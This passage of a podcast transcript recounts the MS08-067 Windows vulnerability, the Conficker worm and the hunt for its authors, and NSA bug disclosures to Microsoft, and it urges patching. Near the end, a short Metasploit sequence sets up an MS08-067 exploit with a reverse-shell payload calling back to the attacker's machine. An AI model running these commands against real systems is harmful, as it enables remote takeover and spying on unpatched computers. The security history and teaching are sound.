And we would not have seen this for potentially years, you know, if they were stealthy and choosy about how they used it. And sometimes these exploits we do learn about, zero-days, have been in use for years in very disciplined ways. The noisier operators are with it, the more likely that some victim is going to find out about it, and somehow they’ll get a whiff of how the attack is working and the thing can get patched. But, you know, I think if we had not seen this one in this way, very likely this operator could have continued for a very long time with it.

This makes me think about how stealthy some hackers can be. I mean, imagine if the hackers disabled WER or blocked all connections to Microsoft. This would have been an effective technique to keep Microsoft from seeing these crash reports and discovering this. But maybe that’s going too crazy with it. But see, sophisticated hackers take extreme measures to hide their tracks. I mean, that’s sort of who your adversaries are, right? Are these APTs, like the NSA? It’s like you’re battling with them; it’s an arms race between you as the vendor and them as the aggressor.

Do you feel that way sometimes? It does feel like that in some ways, sometimes, in the sense of: there are people that have weaponized vulnerabilities and are using them in the wild, and in a way, the defenders are at Microsoft, Google, and other companies. I don’t care who these people are or why they’re doing it. We just want to find what they’re doing and take those tools away from them. And so every time a zero-day is found in the wild by some defender organization and it gets patched, that is a happy day for me.

What a strange thing to think about. Does that put you in deep thought, too?

I mean, the truth of the matter is that the NSA is actively looking for vulnerabilities in windows so that they can use that against their adversaries. And then here’s John actively trying to figure out what the NSA is up to. So he can basically expose their secret weapons. I don’t know what to think about that. I don’t know who the bad guy or the good guy is in this. NSA is supposed to be working towards keeping our country safe, but at the same time, they have to develop cyber weapons to attack other nations. So it almost seems like the NSA would see John and Microsoft as the enemy and John might see the NSA as the enemy.

And I just never thought about how these two would be battling each other like this. It’s just wild to think about this relationship.

Yeah. And in many ways, I feel like I relived this whole moment a couple of years ago, when the EternalBlue exploit was discovered. This is one of these NSA tools that the Shadow Brokers group leaked onto the internet. A patch was produced for it; that was MS17-010. And a couple months later, the WannaCry worm was unleashed and spread in a very similar way, had a more destructive payload, and ran across the globe against systems that had not patched.

Now, if you recall from earlier episodes, the NSA actually did tell Microsoft about EternalBlue just before the Shadow Brokers published it to the world, giving Microsoft an early warning, and they were able to move quickly and patch it before it was released. I’m guessing the NSA knew it was going to be published and wanted to help the world.

Just stay slightly ahead of the game. But that must have been an awkward phone call or whatever for Microsoft, to get the memo that the NSA has found a devastating exploit in Windows, and this exploit got leaked to the Shadow Brokers, and they’re about to leak it to the world. Now, I don’t know; it’s a weird, tangled mess when you get into the relationships between the NSA and Microsoft. And just to be clear, there’s no link between MS08-067 and the NSA.

Oh, something happened last week that’s kind of interesting, too. Last week was Patch Tuesday, and boy, was it a doozy. There was a bug patched; it was a cryptographic API bug in Windows 10, which basically allows an attacker to pose as someone they aren’t, and your computer could send trusted information to them. But here’s the thing: this bug was reported to Microsoft by the NSA. In fact, it was so important, the NSA even held a press conference to urge people to patch. This is very rare. I mean, we don’t know how many times the NSA has reported bugs to Microsoft; they could be doing this all the time. But we do know for sure that there were two times that they did do it: once when the Shadow Brokers got the NSA exploits, and now again last week. The NSA says they told Microsoft because they want to build more trust with people and help keep computers secure. Really, it could be that the world is changing and new things are happening, and the NSA might be doing this more now to try to keep the country safer by working with vendors to get things patched. And in fact, they have done stuff like that for a while, but it’s all been small potatoes versus, like, the god-mode bugs that the NSA keeps to themselves. So my theory is this: the NSA gave this bug to Microsoft. Why? Maybe it was just to build better PR. OK. But then maybe the NSA knows something we don’t. Like, maybe they uncovered a huge man-in-the-middle campaign that some foreign government was running against many Americans and thought it could have devastating results, so this was their way to stop it. Or maybe the NSA lost another exploit and didn’t want their enemy to have it. I don’t know, but I have a feeling there’s more to this story.

So back to Conficker. You might be wondering what happened there. And like I was saying, Conficker infected 10 million computers and was growing. However, it was a mystery as to what Conficker actually did, or who made it, or what it was supposed to do. While it was infecting systems worldwide, it was apparently not doing anything. Once a computer was infected, on a periodic basis the computer that had Conficker running on it would reach out to certain domains to receive instructions on what to do next. But it just didn’t get any instructions. Security teams all over the world feared that maybe there would be instructions on a particular day. And in fact, for some weird reason, we thought that on April 1st, 2009, there was gonna be some big surprise that Conficker was going to give us. I remember being in the office that day and setting up a conference bridge in a war room with everyone from IT, looking for signs of Conficker kicking up or something. But nothing happened. A few companies got really fed up with Conficker spreading everywhere, so they decided to do something about it. In February 2009, something called the Conficker Cabal was formed.

This included people from Microsoft, Verisign, Neustar, America Online, Symantec, F-Secure, researchers from Georgia Tech, the Shadowserver Foundation, and many more organizations. It was a huge list of companies that came together to figure out a way to stop Conficker. They would do things like reverse engineer Conficker to see how it worked and then write fixes to block Conficker from spreading more. But then whoever made Conficker would change how it was infecting machines so it could keep infecting machines, creating a new variant of the worm. It became a game of cat and mouse, with the security professionals blocking it and the worm creator getting around that. At some point, Microsoft said they were willing to pay two hundred and fifty thousand dollars for information that leads to the capture of whoever created the Conficker worm. They were taking this pretty seriously. The FBI started getting involved, and the hunt began to look for whoever was running this worm. The author Mark Bowden did some extraordinary research into this worm in his book, which is just titled Worm. He writes that there are a few theories on what Conficker was.

One is that it was just a security researcher playing around, making a crazy worm, but never intending to do any harm with it, just trying to see how big it could get. Another theory was that a government created this worm and it was waiting for instructions to maybe attack on command, or spy on people, or something. But as more organizations joined the cabal, the more effort was put into looking into this, and they may have found the answer.

They reverse engineered the code and did everything they could to trace it back to its creators. And they handed this information over to the FBI, who then arrested three Ukrainians: Sergei, Yevgen, and Dmitri. These Ukrainians were all millionaires. They drove black Porsches and they lived in penthouse apartments. And their story was that they ran a website, with employees and everything, and they paid themselves, but they weren’t paying themselves very much. And so they were arrested on tax evasion charges. And the feds seem to have found some evidence of Conficker code on their work computers. But I don’t think we have any idea what happened to them next. It doesn’t seem like the FBI was able to extradite them to the U.S., and they just disappeared into the Ukrainian courts.

But the FBI also arrested one other guy, a Swede named Mikael. Mikael was arrested in Denmark in connection with this and extradited to the U.S. The court records don’t say anything about Conficker, though. Instead, the FBI found evidence that Mikael was infecting computers and putting scareware on them. This is where he would infect a computer and say there’s a virus on it and you need to buy this antivirus. But when the victim buys the antivirus, nothing actually gets fixed.

The FBI claims Mikael made $71 million from his scareware campaigns, which is a really big haul; to get that much, you must have a lot of infected machines. And there was evidence in some of the variants of Conficker that it was capable of running scareware. So it might have been getting ready to launch a big campaign to do just that, but it never did. Mikael got two years in prison for the scareware scams that he was running, and it’s alleged that he had ties to those Ukrainians who also got arrested over Conficker. So it seems like the best theory now is that Conficker was made by a group of Ukrainian cyber criminals who may have been planning on using it to send spam emails or run scareware to scam its victims, but they never got to it.

And what’s truly fascinating about Conficker is that it’s still out there, infecting a ton of systems. Even though MS08-067 was patched in 2008, there are still computers out there running systems older than that which haven’t been patched. And the latest estimate is that Conficker is still present on 400,000 computers today.

MS08-067 will go down in history as one of the most notorious vulnerabilities in Windows ever, and the reason for it is because of how effective it is. I personally love playing around with this vulnerability and exploiting Windows computers with it, because it’s so easy to do, and I want to walk you through how I’ve done it. First, you need a version of Windows from before 2008, which is actually quite easy; you just install Windows XP on a computer and don’t patch it. This will be vulnerable to it. Then you need to run this exploit against it. Now, instead of knowing what shellcode to send to the computer and working all that out, there’s a crazy shortcut. It’s called Metasploit. Metasploit is an incredible hacking framework and has over a thousand exploits, all pre-programmed and ready to run. So you pick the MS08-067 exploit, then point it at your Windows XP machine, type run, and boom, you’re in. Now, when I say you’re in, you’re really in. Metasploit has tools to allow you to use that computer you just infected as if you’re right in front of it. You can run any command you want on that computer, all through the command line, take screenshots of the desktop, enable the camera, run a keylogger to watch what someone types; you can do all that and more.

Metasploit is an amazing hacker tool, which is standard for any hacker to know how to use today. And the best part about Metasploit is that it’s free and open source. Anyone can grab it, study a few commands, and have over a thousand exploits ready at their fingertips. It’s really powerful and fun to play with, and if you attend any ethical hacking training, chances are you’ll be given Metasploit and a system vulnerable to MS08-067 as one of your first hacks you’ll do using it, because it’s pretty easy to use and you can see how effective Metasploit can be. So because of that, penetration testers all over the world are very familiar with MS08-067 and all have that number memorized. However, it’s now 2020, so MS08-067 is a dozen years old, which means there are far fewer computers running Windows XP or that are vulnerable to this attack. So this bug is losing its notoriety. It’s much more rare to find a system vulnerable to this today, but they do exist.
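For anyone curious what that actually looks like at the keyboard, a Metasploit session for this bug is only a handful of commands, roughly like the sketch below. The IP addresses are placeholders, exact option names can vary between Metasploit versions, and obviously this should only ever be pointed at a lab machine you own.

msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.50
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

Here, RHOST is the unpatched Windows XP target and LHOST is your own machine, which catches the connection back. If the exploit lands, you’re dropped into a Meterpreter session, which is where the screenshot, keylogger, and webcam tools mentioned above live.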

This story is another example of why it's so important to update your software as soon as you can. However, it's not always that easy. Some networks have very strict controls and can't just patch; a patch might break everything. The applications and software running on those computers don't always work with the latest OS updates applied, and this quickly becomes a nightmare. I recently updated my home computer and a lot of the software I was running stopped working, so I had to wait for each application maker to put out an update before I was back up and working again. Something like that is totally unacceptable in critical networks like hospitals or power plants, so it's not always as simple as just patching. Like I was saying at the beginning, it's a lot of different people's jobs to keep our networks secure. In this case, Microsoft did their job by finding the bug and issuing a patch for it, and now that fix needs to trickle all the way down to everyone's computers, because being on the most up-to-date version is like giving yourself a vaccination against the known attacks in the world. Updating your apps, operating systems and programs is, in my opinion, the single most effective thing you can do to protect yourself on the Internet today.

A big thank you to John Lambert from Microsoft for coming on the show and sharing this story with us. I found it to be really cool. Also, if you want to know more about Conficker, check out the book Worm by Mark Bowden; it goes into a lot of detail about it. Hey, if you're all caught up with this podcast and want more episodes, check out the Darknet Diaries Patreon page, where you can find bonus episodes. The show is made by me, the cyber ghost, Jack Reciter. Music in this episode was special: typically I grab songs from all over, but in this one every single song was created by the talented Breakmaster Cylinder. And even though hoodies go up and drawstrings get pulled tight every time I see it, this is Darknet Diaries.

